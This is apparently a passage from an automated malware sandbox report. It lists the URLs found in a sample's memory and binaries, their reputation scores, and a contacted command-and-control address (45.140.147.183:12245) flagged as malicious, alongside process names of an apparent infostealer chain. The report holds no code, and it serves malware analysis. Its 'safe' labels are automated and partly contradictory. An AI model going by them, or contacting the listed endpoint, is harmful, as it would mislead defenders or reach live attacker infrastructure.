                    http://tempuri.org/Entity/Id14ResponseD0%URL Reputationsafe
                    http://tempuri.org/Entity/Id23ResponseD0%URL Reputationsafe
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary0%URL Reputationsafe
                    http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha10%URL Reputationsafe
                    http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap0%URL Reputationsafe
                    http://tempuri.org/Entity/Id90%URL Reputationsafe
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID0%URL Reputationsafe
                    http://tempuri.org/Entity/Id80%URL Reputationsafe
                    http://tempuri.org/Entity/Id6ResponseD0%URL Reputationsafe
                    http://tempuri.org/Entity/Id50%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare0%URL Reputationsafe
                    http://tempuri.org/Entity/Id40%URL Reputationsafe
                    http://tempuri.org/Entity/Id70%URL Reputationsafe
                    http://tempuri.org/Entity/Id60%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret0%URL Reputationsafe
                    http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                    http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence0%URL Reputationsafe
                    https://www.remobjects.com/ps0%URL Reputationsafe
                    http://tempuri.org/Entity/Id13ResponseD0%URL Reputationsafe
                    https://www.innosetup.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/fault0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat0%URL Reputationsafe
                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey0%URL Reputationsafe
                    http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id5ResponseD0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register0%URL Reputationsafe
                    http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey0%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/sc0%URL Reputationsafe
                    http://tempuri.org/Entity/Id1ResponseD0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel0%URL Reputationsafe
                    http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id200%URL Reputationsafe
                    http://tempuri.org/Entity/Id210%URL Reputationsafe
                    http://tempuri.org/Entity/Id220%URL Reputationsafe
                    http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA10%URL Reputationsafe
                    http://tempuri.org/Entity/Id230%URL Reputationsafe
                    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA10%URL Reputationsafe
                    http://tempuri.org/Entity/Id240%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue0%URL Reputationsafe
                    http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego0%URL Reputationsafe
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey0%URL Reputationsafe
                    http://tempuri.org/Entity/Id21ResponseD0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/trust0%URL Reputationsafe
                    http://tempuri.org/Entity/Id100%URL Reputationsafe
                    http://tempuri.org/Entity/Id110%URL Reputationsafe
                    http://tempuri.org/Entity/Id10ResponseD0%URL Reputationsafe
                    http://tempuri.org/Entity/Id120%URL Reputationsafe
                    http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel0%URL Reputationsafe
                    http://tempuri.org/Entity/Id130%URL Reputationsafe
                    http://tempuri.org/Entity/Id140%URL Reputationsafe
                    http://tempuri.org/Entity/Id150%URL Reputationsafe
                    http://tempuri.org/Entity/Id160%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce0%URL Reputationsafe
                    http://tempuri.org/Entity/Id170%URL Reputationsafe
                    http://tempuri.org/Entity/Id180%URL Reputationsafe
                    http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id190%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns0%URL Reputationsafe
                    http://tempuri.org/Entity/Id15ResponseD0%URL Reputationsafe
                    http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/02/trust/Renew0%URL Reputationsafe
                    http://tempuri.org/Entity/Id11ResponseD0%URL Reputationsafe
                    http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey0%URL Reputationsafe
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.00%URL Reputationsafe
                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentity0%URL Reputationsafe
                    http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                    http://www.autodesk.com/0http://www.autodesk.com/0http://www.autodesk.com/0%Avira URL Cloudsafe
                    45.140.147.183:122450%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    WTYoyXMgGLmyIq.WTYoyXMgGLmyIq
                    		unknown
                    		unknownfalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      45.140.147.183:12245true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUbe5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, is-RI2MT.tmp.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id14ResponseDRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id23ResponseDRegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id12ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id2ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id21ResponseRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id9RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id8RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id6ResponseDRegAsm.exe, 00000014.00000002.2568169273.000000000289D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id5RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id4RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id7RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id6RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id19ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.remobjects.com/psbe5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1634957326.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1633297447.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000000.1636308762.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Setup.exe, 00000002.00000003.1657177006.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.1654004225.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000000.1660124095.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Setup.tmp.2.dr, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id13ResponseDRegAsm.exe, 00000014.00000002.2568169273.0000000002873000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.innosetup.com/be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1634957326.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe, 00000000.00000003.1633297447.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000000.1636308762.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Setup.exe, 00000002.00000003.1657177006.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.1654004225.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000000.1660124095.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Setup.tmp.2.dr, be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsatRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id5ResponseDRegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000014.00000002.2568169273.0000000002829000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id6ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.autoitscript.com/autoit3/JMmReveals.exe, 00000003.00000003.1675095566.00000000028A1000.00000004.00000020.00020000.00000000.sdmp, Eco.pif, 0000000E.00000000.1699641380.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp, Eco.pif.5.dr, Glasses.3.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.ip.sb/ipEco.pif, 0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2259828700.0000000004821000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266853177.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266944790.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2260351843.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2266772468.0000000003EA2000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2259618326.000000000486B000.00000004.00000800.00020000.00000000.sdmp, Eco.pif, 0000000E.00000003.2260600980.0000000004861000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/04/scRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id9ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id20RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id21RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id22RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id23RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorErrorMmReveals.exe, 00000003.00000000.1652016339.0000000000408000.00000002.00000001.01000000.00000008.sdmp, MmReveals.exe, 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp, is-RISCU.tmp.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id24RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id1ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.autodesk.com/0http://www.autodesk.com/0http://www.autodesk.com/Setup.exe, 00000002.00000003.1652253190.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Setup.tmp, 00000004.00000003.1664466450.00000000034B0000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id21ResponseDRegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/04/trustRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id10RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id11RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id10ResponseDRegAsm.exe, 00000014.00000002.2568169273.0000000002873000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id12RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id16ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id13RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id14RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id15RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id16RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trust/NonceRegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id17RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id18RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id19RegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.2568169273.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id15ResponseDRegAsm.exe, 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 00000014.00000002.2568169273.0000000002721000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
